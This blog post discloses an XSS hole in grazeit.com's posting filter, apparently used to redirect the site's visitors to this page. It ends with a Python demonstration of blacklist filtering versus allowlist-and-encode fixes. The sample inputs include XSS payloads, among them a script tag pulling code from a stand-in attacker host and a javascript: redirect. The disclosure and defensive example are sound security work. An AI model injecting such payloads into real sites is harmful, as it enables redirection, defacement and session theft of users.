Recently while grazing over the net, I found this site grazeit.com. This is a site which keeps a database of good websites found on the net by netizens.
But there is an XSS (cross-site scripting) hole on the site which allows a user to redirect the page to any desired location.
This particular payload does not work in Mozilla Firefox. That is not because Firefox is immune to XSS (the hole is in the site's filter, not in the browser), but if you are not using Firefox, you can download it for free (the link is given at the bottom right).
You probably arrived at this page from grazeit.com if you are using Microsoft Internet Explorer!
So how does it work?
Grazeit.com allows an <IMG> tag with the src attribute.
is all we have to post to get redirected.
So the grazeit admins have modified the filter to take care of the above two methods. But the filter still isn't good enough for:
<script src="URL" /> (fixed)
GET cross-site scripting holes
To the Grazeit.com administrators:
Great work, guys. But please remove this serious security vulnerability: it can be used for more than redirection, for example to deface the site or to steal user sessions.
Thank you for making Grazeit.com.
How to remove this vulnerability?
To remove this vulnerability you have to strengthen the filters.
Blacklisting individual tags (first <IMG>, then <script>) keeps failing because there is always another vector the list does not cover. The src value must instead be validated against an allowlist of what a link may contain (an http or https URL, with unacceptable characters stripped or percent-encoded), and the special characters must then be encoded when the value is placed into the page, so that the URL remains the same for the user but it would never be rendered by the browser as markup or script.
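As an added example (not grazeit.com's code, whose filter I have not seen), here is the difference between the two approaches in Python. `blacklist_filter` models the tag-by-tag filter the post describes; `canonical_url` and `render_link` are hypothetical names for the allowlist-and-encode fix: accept only http/https URLs with a plain hostname, percent-encode anything that is not legal in a URL, and HTML-attribute-encode the result when it is written into the page. The submissions are constructed samples; `attacker.invalid` is a reserved name, not a real host.

```python
import html
import re
from urllib.parse import quote, urlsplit, urlunsplit

# Constructed sample submissions (not real grazeit.com data).
SUBMISSIONS = [
    "http://example.com/",                                         # benign link
    '<IMG src="http://attacker.invalid/">',                        # the vector the post mentions
    '"><script src="http://attacker.invalid/x.js"></script>',      # attribute breakout
    "javascript:document.location='http://attacker.invalid/'",     # script URL, no tag needed
    "http://example.com/?q=<IMG src=x onerror=alert(1)>",          # markup inside a query string
]


def blacklist_filter(value: str) -> str:
    """The kind of filter the post describes: strip the tags seen so far.
    Each patched vector gets another pattern; anything not listed passes."""
    return re.sub(r"<\s*(img|iframe)\b[^>]*>", "", value, flags=re.IGNORECASE)


ALLOWED_SCHEMES = {"http", "https"}
# RFC 3986 unreserved + sub-delims + ':' and '@'; '%' kept so existing escapes survive.
_PCHAR = "-._~!$&'()*+,;=:@%"
_HOST_RE = re.compile(r"[A-Za-z0-9.\-]+(:\d{1,5})?")  # plain host[:port]; no userinfo


def canonical_url(value: str):
    """Return a canonical http(s) URL, or None if the submission is not a plain link.
    This is an allowlist: we say what a link may be, not what an attack looks like."""
    value = value.strip()
    # Control characters (tab, newline, NUL) are used to disguise schemes; reject them.
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in value):
        return None
    parts = urlsplit(value)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return None   # catches javascript:, data:, vbscript:, and scheme-less "//host" or bare markup
    if not _HOST_RE.fullmatch(parts.netloc):
        return None   # rejects user@host tricks, brackets, spaces and quotes in the host part
    # Percent-encode anything that is not legal in each URL component; '<', '>', '"' and
    # space are escaped here, so the link still works but can never close an attribute.
    path = quote(parts.path, safe="/" + _PCHAR)
    query = quote(parts.query, safe="/?" + _PCHAR)
    fragment = quote(parts.fragment, safe="/?" + _PCHAR)
    return urlunsplit((parts.scheme.lower(), parts.netloc.lower(), path, query, fragment))


def render_link(value: str) -> str:
    """Validate, then encode for the HTML context the value lands in (a quoted attribute
    and a text node). Encoding on output is what stops the browser treating it as markup."""
    url = canonical_url(value)
    if url is None:
        return "<span>(rejected link)</span>"
    return '<a href="%s">%s</a>' % (html.escape(url, quote=True), html.escape(url))


if __name__ == "__main__":
    for submission in SUBMISSIONS:
        print("blacklist :", blacklist_filter(submission))
        print("allowlist :", render_link(submission))
        print()
```

Running it shows the blacklist removing the <IMG> tag but passing the <script> tag untouched, while the allowlist rejects every submission that is not an http(s) link and neutralises the markup hidden in the query string by percent-encoding it. Note that `canonical_url` deliberately rejects userinfo (`user@host`) and IPv6 literals; a link directory does not need them, and dropping them removes a class of host-spoofing tricks.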